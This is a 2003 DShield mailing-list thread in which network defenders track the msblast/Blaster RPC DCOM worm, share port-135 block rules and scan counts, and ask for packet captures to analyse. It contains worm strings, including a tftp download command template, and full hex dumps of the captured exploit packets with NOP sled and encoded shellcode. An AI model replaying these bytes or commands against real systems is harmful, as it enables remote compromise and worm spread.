0590 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.

05A0 C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k. at d..
05B0 77 65 6B D6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 wek......d.!.2..
05C0 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 :...4r....9..:.
05D0 34 72 A0 0B 17 8A 94 80 BF B9 51 DE E2 F0 90 80 4r........Q.....
05E0 EC 67 C2 D7 34 5E B0 98 34 77 A8 0B EB 37 EC 83 .g..4^..4w...7..
05F0 6A B9 DE 98 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 j...4h..b...4...
0600 4A 01 6B 7C 8C F2 38 BA 7B 46 93 41 70 3F 97 78 J.k|..8.{F.Ap?.x
0610 54 C0 AF FC 9B 26 E1 61 34 68 B0 83 62 54 1F 8C T....&.a4h..bT..
0620 F4 B9 CE 9C BC EF 1F 84 34 31 51 6B BD 01 54 0B ........41Qk..T.
0630 6A 6D CA DD E4 F0 90 80 2F A2 04 00 5C 00 43 00 jm....../...\.C.
0640 24 00 5C 00 31 00 32 00 33 00 34 00 35 00 36 00 $.\.1.2.3.4.5.6.
0650 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
0660 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2E 00 1.1.1.1.1.1.1...
0670 64 00 6F 00 63 00 00 00 01 10 08 00 CC CC CC CC d.o.c...........
0680 20 00 00 00 30 00 2D 00 00 00 00 00 88 2A 0C 00 ...0.-......*..
0690 02 00 00 00 01 00 00 00 28 8C 0C 00 01 00 00 00 ........(.......
06A0 07 00 00 00 00 00 00 00 ........

65.33.159.235 : 1040 TCP Disconnected ID = 6
--- 8/10/03 18:38:33.400
Status Code: 0 OK



----- Original Message ----- 
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Sent: Monday, August 11, 2003 3:01 PM
Subject: RE: [Dshield] infocon: yellow


> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and disassemble
> it to find out exactly what it's doing.
>
> If anyone has captured it and is willing to share it I would greatly
> appreciate it.
>
> Chris Ream
> Synaptek Network Security.
>
>
> -----Original Message-----
> From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
> Behalf Of Andy Hopkins
> Sent: Monday, August 11, 2003 2:28 PM
> To: 'General DShield Discussion List'
> Subject: RE: [Dshield] infocon: yellow
>
> FYI: Its started here in NZ at 02:30 local time
>
> ------------------------------------------
> Andy Hopkins
> Senior Unix & Firewall Administrator
> healthAlliance
>
> (+64) (9) 486 8944
> (+64) (25) 285 2139
>
> Disclaimer:
> The views and information expressed in this e-Mail are actually mine,
> because my partner says so!
> healthAlliance doesn't necessarily agree with me either
>
>
>
> -----Original Message-----
> From: Johannes B. Ullrich [mailto:jullrich at sans.org]
> Sent: Tuesday, 12 August 2003 06:24
> To: list at dshield.org
> Subject: [Dshield] infocon: yellow
>
>
> This message was converted from multipart/signed to ascii armored
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Content-Type: text/plain
> Content-Transfer-Encoding: quoted-printable
>
> We just got a binary that looks very much like an
> RPC worm. It scans for port 135. No real idea what it does (other than
> scanning).
>
> Strings from the file:
>
> msblast.exe
> I just want to say LOVE YOU SAN!!
> billy gates why do you make this possible ?
> Stop making money and fix your software
> windowsupdate.com
>
> BILLY
> windows auto update
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
> tftp -i %s GET %s
>
>
>
>
> -- 
> SANS - Internet Storm Center
> http://isc.sans.org
> PGP Key: http://isc.sans.org/jullrich.txt
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.1 (GNU/Linux)
>
> iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
> FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----
>
> --
> SHA1
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www.dshield.org/mailman/listinfo/list
>
> _______________________________________________
> list mailing list
> list at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list



> ATTACHMENT part 3.14 message/rfc822 
Date: Mon, 11 Aug 2003 16:39 -0500
From: haled at longlines.com
To: General DShield Discussion List 

CC: 
Subject: Re: Re: [Dshield] infocon: yellow
Message-ID: <200308112139.h7BLdrN2021202 at elwood.pionet.net>
Content-Type: text/plain
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 14

And if I could get some of the ISP's in the area to get their "head out of their hiney" long enough to smell the roses - they wouldn't be getting overwhelmed either. I am fighting a losing battle I think! Their attitude is OH Well - it is the customers problem. 



>haled at longlines.com wrote:
>
>> Iowa is getting hammered right now. I have talked to a couple of the
>> offending ISP's and they said that they are getting calls from
>> customers who say that the customer is getting an error that says
>> that they have to reboot.
>
>
>On one of our ISPs:
> deny tcp any any range 135 139 (223189 matches)
> deny udp any any range 135 netbios-ss (105897 matches)
> deny udp any any eq 445
> deny tcp any any eq 445 (74579 matches)
>
>On another:
> deny tcp any any range 135 139 (147934 matches)
> deny udp any any range 135 netbios-ss (103334 matches)
> deny udp any any eq 445
> deny tcp any any eq 445 (56901 matches)
>
>This data is a little over 14 hours accumulated time.
>
>Jeff
>
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list

-------------------
Email sent using Long Lines Web Mail (http://www.longlines.com/)




> ATTACHMENT part 3.15 message/rfc822 
Date: Mon, 11 Aug 2003 17:38:12 -0400
From: Jonathan Rickman 
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: <200308111738.12075.jonathan at xcorps.net>
In-Reply-To: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
References: <000701c3604b$ae7c6ef0$468d11d8 at CLR>
Content-Type: Multipart/Mixed;
boundary="Boundary-00=_EzAO/cP3rui1QTV"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 15

On Monday 11 August 2003 17:01, Chris Ream wrote:
> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and disassemble
> it to find out exactly what it's doing.
>
> If anyone has captured it and is willing to share it I would greatly
> appreciate it.

Hex dump from netcat attached.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net

00000000 05 00 0b 03 10 00 00 00 48 00 00 00 7f 00 00 00 ........ H.......
00000010 d0 16 d0 16 00 00 00 00 01 00 00 00 01 00 01 00 ........ ........
00000020 a0 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ........ .......F
00000030 00 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 .....].. ........
00000040 2b 10 48 60 02 00 00 00 +.H`.... 
00000048 05 00 00 03 10 00 00 00 a8 06 00 00 e5 00 00 00 ........ ........
00000058 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ........ ........
00000068 00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae ....2$X. .EdI.p..
00000078 74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 t,..`^.. ........
00000088 70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 p^...... |^......
00000098 10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 ........ *M...j. 
000000A8 af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 .nr..... MARB....
000000B8 00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 ........ ........
000000C8 20 06 00 00 20 06 00 00 4d 45 4f 57 04 00 00 00 ... ... MEOW....
000000D8 a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ........ .......F
000000E8 38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 8....... .......F
000000F8 00 00 00 00 f0 05 00 00 e8 05 00 00 00 00 00 00 ........ ........
00000108 01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 ........ ....MEOW
00000118 e8 05 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 ........ ........
00000128 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000138 00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 .....(.. d)......
00000148 07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 ........ ........
00000158 00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 ...F.... ........
00000168 00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 ...F.... ........
00000178 00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 ...F.... ........
00000188 00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 ...F.... ........
00000198 00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 ...F.... ........
000001A8 00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 ...F.... ........
000001B8 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F.... `...X...
000001C8 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 .... at ... ...8...
000001D8 30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc 0....... ........
000001E8 50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 P...O.. ........
000001F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000208 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000218 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000228 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000238 00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc ........ ........
00000248 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f. ........
00000258 c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F ........
00000268 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 ........ ....x...
00000278 58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 X....... ....p...
00000288 98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 .O...=.W ....2.1.
00000298 01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba ........ ........
000002A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002B8 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C...... `...`...
000002C8 4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 MEOW.... ........
000002D8 c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 .......F ;.......
000002E8 c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F ....0...
000002F8 01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a ........ ...J....
00000308 50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz..... ........
00000318 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ........ ........
00000328 01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 ........ 0...x.n.
00000338 00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 ........ ........
00000348 20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 /...... ........
00000358 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........ F.X.....
00000368 01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 ........ ....0...
00000378 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000388 01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff ........ h.......
00000398 68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 h....... ........
000003A8 86 01 00 00 00 00 00 00 86 01 00 00 5c 00 5c 00 ........ ....\.\.
000003B8 46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B. F.X.F.X.
000003C8 4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X. F.X.F.X.
000003D8 46 00 58 00 9d 13 00 01 cc e0 fd 7f cc e0 fd 7f F.X..... ........
000003E8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
000003F8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000408 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000418 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000428 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000438 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000448 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000458 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000468 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000478 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
00000488 90 90 90 90 90 90 90 eb 19 5e 31 c9 81 e9 89 ff ........ .^1.....
00000498 ff ff 81 36 80 bf 32 94 81 ee fc ff ff ff e2 f2 ...6..2. ........
000004A8 eb 05 e8 e2 ff ff ff 03 53 06 1f 74 57 75 95 80 ........ S..tWu..
000004B8 bf bb 92 7f 89 5a 1a ce b1 de 7c e1 be 32 94 09 .....Z.. ..|..2..
000004C8 f9 3a 6b b6 d7 9f 4d 85 71 da c6 81 bf 32 1d c6 .:k...M. q....2..
000004D8 b3 5a f8 ec bf 32 fc b3 8d 1c f0 e8 c8 41 a6 df .Z...2.. .....A..
000004E8 eb cd c2 88 36 74 90 7f 89 5a e6 7e 0c 24 7c ad ....6t.. .Z.~.$|.
000004F8 be 32 94 09 f9 22 6b b6 d7 4c 4c 62 cc da 8a 81 .2..."k. .LLb....
00000508 bf 32 1d c6 ab cd e2 84 d7 f9 79 7c 84 da 9a 81 .2...... ..y|....
00000518 bf 32 1d c6 a7 cd e2 84 d7 eb 9d 75 12 da 6a 80 .2...... ...u..j.
00000528 bf 32 1d c6 a3 cd e2 84 d7 96 8e f0 78 da 7a 80 .2...... ....x.z.
00000538 bf 32 1d c6 9f cd e2 84 d7 96 39 ae 56 da 4a 80 .2...... ..9.V.J.
00000548 bf 32 1d c6 9b cd e2 84 d7 d7 dd 06 f6 da 5a 80 .2...... ......Z.
00000558 bf 32 1d c6 97 cd e2 84 d7 d5 ed 46 c6 da 2a 80 .2...... ...F..*.
00000568 bf 32 1d c6 93 01 6b 01 53 a2 95 80 bf 66 fc 81 .2....k. S....f..
00000578 be 32 94 7f e9 2a c4 d0 ef 62 d4 d0 ff 62 6b d6 .2...*.. .b...bk.
00000588 a3 b9 4c d7 e8 5a 96 80 ae 6e 1f 4c d5 24 c5 d3 ..L..Z.. .n.L.$..
00000598 40 64 b4 d7 ec cd c2 a4 e8 63 c7 7f e9 1a 1f 50 @d...... .c.....P
000005A8 d7 57 ec e5 bf 5a f7 ed db 1c 1d e6 8f b1 78 d4 .W...Z.. ......x.
000005B8 32 0e b0 b3 7f 01 5d 03 7e 27 3f 62 42 f4 d0 a4 2.....]. ~'?bB...
000005C8 af 76 6a c4 9b 0f 1d d4 9b 7a 1d d4 9b 7e 1d d4 .vj..... .z...~..
000005D8 9b 62 19 c4 9b 22 c0 d0 ee 63 c5 ea be 63 c5 7f .b...".. .c...c..
000005E8 c9 02 c5 7f e9 22 1f 4c d5 cd 6b b1 40 64 98 0b .....".L ..k. at d..
000005F8 77 65 6b d6 wek.
000005FC 93 cd c2 94 ea 64 f0 21 8f 32 94 80 3a f2 ec 8c .....d.! .2..:...
0000060C 34 72 98 0b cf 2e 39 0b d7 3a 7f 89 34 72 a0 0b 4r....9. .:..4r..
0000061C 17 8a 94 80 bf b9 51 de e2 f0 90 80 ec 67 c2 d7 ......Q. .....g..
0000062C 34 5e b0 98 34 77 a8 0b eb 37 ec 83 6a b9 de 98 4^..4w.. .7..j...
0000063C 34 68 b4 83 62 d1 a6 c9 34 06 1f 83 4a 01 6b 7c 4h..b... 4...J.k|
0000064C 8c f2 38 ba 7b 46 93 41 70 3f 97 78 54 c0 af fc ..8.{F.A p?.xT...
0000065C 9b 26 e1 61 34 68 b0 83 62 54 1f 8c f4 b9 ce 9c .&.a4h.. bT......
0000066C bc ef 1f 84 34 31 51 6b bd 01 54 0b 6a 6d ca dd ....41Qk ..T.jm..
0000067C e4 f0 90 80 2f a2 04 00 5c 00 43 00 24 00 5c 00 ..../... \.C.$.\.
0000068C 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4. 5.6.1.1.
0000069C 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1. 1.1.1.1.
000006AC 31 00 31 00 31 00 31 00 31 00 2e 00 64 00 6f 00 1.1.1.1. 1...d.o.
000006BC 63 00 00 00 01 10 08 00 cc cc cc cc 20 00 00 00 c....... .... ...
000006CC 30 00 2d 00 00 00 00 00 88 2a 0c 00 02 00 00 00 0.-..... .*......
000006DC 01 00 00 00 28 8c 0c 00 01 00 00 00 07 00 00 00 ....(... ........
000006EC 00 00 00 00 ....


> ATTACHMENT part 3.16 message/rfc822 
Date: Mon, 11 Aug 2003 17:57:54 -0400
From: Phil.Rodrigues at uconn.edu
To: General DShield Discussion List 

Subject: Re: [Dshield] infocon: yellow
Message-ID: 
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Precedence: list
Reply-to: General DShield Discussion List 

Message: 16

And here is a graph of our TCP 135 hits per 30mins. Have fun watching it 
grow!

http://aster.uits.uconn.edu/~ipaudit/images/dcom-large.png

Phil

=======================================
Philip A. Rodrigues
Network Analyst, UITS
University of Connecticut

email: phil.rodrigues at uconn.edu
phone: 860.486.3743
fax: 860.486.6580
web: http://www.security.uconn.edu
=======================================





Phil.Rodrigues at uconn.edu
Sent by: list-bounces at dshield.org
08/11/2003 05:01 PM
Please respond to General DShield Discussion List


To: General DShield Discussion List 

cc: 
Subject: Re: [Dshield] infocon: yellow


This is our number of dropped TCP 135 requests since noon today, per 30 
mins:

57,003 1200 to 1230
75,317 1230
59,321 1300
52,642 1330
130,932 1400
202,996 1430
277,183 1500
247,682 1530
320,919 1600
361,504 1630 to 1700

Phil

=======================================
Philip A. Rodrigues
Network Analyst, UITS
University of Connecticut

email: phil.rodrigues at uconn.edu
phone: 860.486.3743
fax: 860.486.6580
web: http://www.security.uconn.edu
=======================================





Jonathan Rickman 
Sent by: list-bounces at dshield.org
08/11/2003 04:47 PM
Please respond to General DShield Discussion List


To: General DShield Discussion List 

cc: 
Subject: Re: [Dshield] infocon: yellow


On Monday 11 August 2003 16:27, Andy Hopkins wrote:
> FYI: Its started here in NZ at 02:30 local time

Got a flurry of them here at 15:43 EST but it promptly ceased at 16:20 
EST. 
Waiting for confirmation that it has been blocked upstream. 

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net


_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list



_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list





> ATTACHMENT part 3.17 message/rfc822 
Date: Mon, 11 Aug 2003 16:10:00 -0600
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <001b01c36055$4eff80c0$468d11d8 at CLR>
In-Reply-To: <200308111738.12075.jonathan at xcorps.net>
Content-Type: text/plain;
charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 17

Excellent, Thank you! I know what it is doing fairly well, but I want to
analyze the HOW of it.

Take care,
Chris.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Jonathan Rickman
Sent: Monday, August 11, 2003 3:38 PM
To: General DShield Discussion List
Subject: Re: [Dshield] infocon: yellow

On Monday 11 August 2003 17:01, Chris Ream wrote:
> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and
disassemble
> it to find out exactly what it's doing.
>
> If anyone has captured it and is willing to share it I would greatly
> appreciate it.

Hex dump from netcat attached.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net




> ATTACHMENT part 3.18 message/rfc822 
Date: Mon, 11 Aug 2003 16:20:03 -0600
From: "Chris Ream" 
To: "'General DShield Discussion List'" 

Subject: RE: [Dshield] infocon: yellow
Message-ID: <001c01c36056$b68b6af0$468d11d8 at CLR>
In-Reply-To: <012501c3604e$b08270c0$07a8a8c0 at delphi>
Content-Type: text/plain;
charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Precedence: list
Reply-to: General DShield Discussion List 

Message: 18

On an initial look, I would agree with you. Now time to fire up IDA Pro
and get this straight.

Chris.


-----Original Message-----
From: list-bounces at dshield.org [mailto:list-bounces at dshield.org] On
Behalf Of Blake McNeill
Sent: Monday, August 11, 2003 3:23 PM
To: General DShield Discussion List
Subject: Re: [Dshield] infocon: yellow

This is a capture from last night, but now we are seeing lots of them.
One
person told me that this is the xFocus/Metaploit scan, but we have not
see
it with the second part until this morning, but we had seen lots of
xFocus/Metaploit scans before ( http://www.linklogger.com/RPC_DCOM.htm
), so
I have some doubts about their analysis and perhaps this is the worm.

Blake
http://www.SonicLogger.com - Logging Software for SonicWall and 3Com
http://www.LinkLogger.com - Logging Software for Linksys, Netgear and
Zyxel


TCP Connection Request
--- 8/10/03 18:38:27.580

65.33.159.235 : 1040 TCP Connected ID = 6
--- 8/10/03 18:38:27.690
Status Code: 0 OK

65.33.159.235 : 1040 TCP Data In
--- 8/10/03 18:38:29.390
0000 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00
........H......
0010 D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00
................
0020 A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46
...............F
0030 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00
.....]..........
0040 2B 10 48 60 02 00 00 00 +.H`....

65.33.159.235 : 1040 TCP Data In
--- 8/10/03 18:38:29.720
0000 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00
................
0010 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00
................
0020 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE
....2$X..EdI.p..
0030 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00
t,..`^..........
0040 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00
p^......|^......
0050 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20
........*M...j.
0060 AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00
.nr.....MARB....
0070 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00
................
0080 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ...
...MEOW....
0090 A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46
...............F
00A0 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46
8..............F
00B0 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00
................
00C0 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57
............MEOW
00D0 E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00
................
00E0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
00F0 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00
.....(..d)......
0100 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00
................
0110 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00
...F............
0120 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00
...F............
0130 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00
...F............
0140 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00
...F............
0150 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00
...F............
0160 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00
...F............
0170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00
...F....`...X...
0180 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 .... at ...
...8...
0190 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC
0...............
01A0 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O..
........
01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
01F0 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC
................
0200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00
H.....f.........
0210 C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00
.......F........
0220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00
............x...
0230 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93
X...........p...
0240 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00
.O...=.W....2.1.
0250 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA
................
0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00
.C......`...`...
0280 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00
MEOW............
0290 C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00
.......F;.......
02A0 C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00
.......F....0...
02B0 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A
...........J....
02C0 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00
Poz.............
02D0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
................
02E0 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00
........0...x.n.
02F0 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00
................
0300 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00
/..............
0310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00
........F.X.....
0320 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00
............0...
0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................
0340 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF
........h.......
0350 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00
h...............
0360 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00
............\.\.
0370 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00
F.X.N.B.F.X.F.X.
0380 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00
N.B.F.X.F.X.F.X.
0390 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F
F.X...........
03A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
03B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
03C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
03D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
03E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
03F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
0400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
0410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
0420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
0430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
................
0440 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF
.........^1.....
0450 FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2
...6..2.........
0460 EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80
........S..tWu..
0470 BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09
....Z....|..2..
0480 F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6
.:k...M.q....2..
0490 B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF
.Z...2.......A..
04A0 EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD
....6t..Z.~.$|.
04B0 BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81
.2..."k..LLb....
04C0 BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81
.2........y|....
04D0 BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80
.2.........u..j.
04E0 BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80
.2..........x.z.
04F0 BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80
.2........9.V.J.
0500 BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80
.2............Z.
0510 BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80
.2.........F..*.
0520 BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81
.2....k.S....f..
